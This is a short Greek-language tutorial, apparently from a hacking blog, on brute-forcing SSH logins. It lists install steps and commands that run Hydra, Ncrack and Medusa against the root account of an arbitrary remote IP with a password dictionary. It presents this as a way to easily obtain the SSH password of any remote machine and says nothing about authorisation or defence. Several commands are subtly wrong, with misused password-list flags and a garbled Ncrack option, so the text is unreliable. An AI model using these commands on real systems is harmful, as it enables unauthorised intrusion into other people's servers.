Οι Bruteforce επιθέσεις λειτουργούν δοκιμάζοντας κάθε πιθανό συνδυασμό που θα μπορούσε να χρησιμοποιηθεί ως κωδικός πρόσβασης από τον χρήστη. Για να δείτε εάν ο κωδικός πρόσβασης είναι σωστός ή όχι, ελέγξτε για τυχόν σφάλματα στην απάντηση από τον διακομιστή.
Τα εργαλεία που θα χρησιμοποιήσουμε για το bruteforce του SSH είναι:
- HYDRA
- NCRACK
- MEDUSA
Τώρα για να κάνετε bruteforce οπουδήποτε, χρειάζεστε μια καλή λίστα λεξικών που μπορείτε εύκολα να τη βρείτε μέσω της βάσης δεδομένων ασφαλείας Packet storm .
1) Bruteforce χρησιμοποιώντας το Hydra
Για να εγκαταστήσετε το Hydra σε ένα υπολογιστή με Kali Linux, πληκτρολογήστε την παρακάτω εντολή:
Εντολή: apt-get install hydra hydra-gtk
Για να τρέξει πληκτρολογήστε
Εντολή: hydra -l root -p ‘<File Dictionary>’ <Remote IP> SSH
2) Bruteforce χρησιμοποιώντας το Ncrack
Το Ncrack είναι λίγο πιο δύσκολο από το Hydra στη χρήση του, αλλά είναι πιο ισχυρό μεταξύ όλων των άλλων εργαλείων. Για να κατεβάσετε το Ncrack, δώστε την εντολή:
Εντολή: wget https://nmap.org/ncrack/dist/ncrack-0.5.tar.gz
Τώρα εξαγάγετε το πακέτο Ncrack με τη βοήθεια της εντολής Tar:
Εντολή: tar -xvzf ncrack-0.5.tar.gz
Τώρα πρέπει να διαμορφώσουμε και να συντάξουμε αυτό το ncrack πληκτρολογώντας τις εντολές ” ./configure “, ” make ” και ” make install “.
Για να χρησιμοποιήσετε το Ncrack, πληκτρολογήστε την παρακάτω εντολή στο τερματικό σας:
Εντολή: ncrack -p 22 –root root -p ‘<File Dictionary>’ <Remote IP>
3) Bruteforce χρησιμοποιώντας το Medusa
Το Medusa είναι ένα άλλο δημοφιλές εργαλείο bruteforcing μέσω του οποίου μπορείτε εύκολα να βρείτε τον κωδικό πρόσβασης SSH οποιουδήποτε απομακρυσμένου μηχανήματος.
Για να κατεβάσετε το Medusa στα Kali Linux, πληκτρολογήστε την παρακάτω εντολή:
Εντολή: wget http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz
Τώρα για να εξαγάγετε το πακέτο λήψης medusa, πληκτρολογήστε:
Εντολή: tar -xvzf medusa-2.0.tar.gz
Τώρα μετά την εξαγωγή των αρχείων, το επόμενο βήμα που θα κάνουμε, είναι να διαμορφώσουμε το εργαλείο πληκτρολογώντας τις εντολές: “./configure”, “make” και “make install”.
Για να εκτελέσετε το Medusa, πληκτρολογήστε την ακόλουθη εντολή στο τερματικό σας:
Εντολή: medusa -u root -p ‘<File Dictionary>’ -h <Remote IP> -m ssh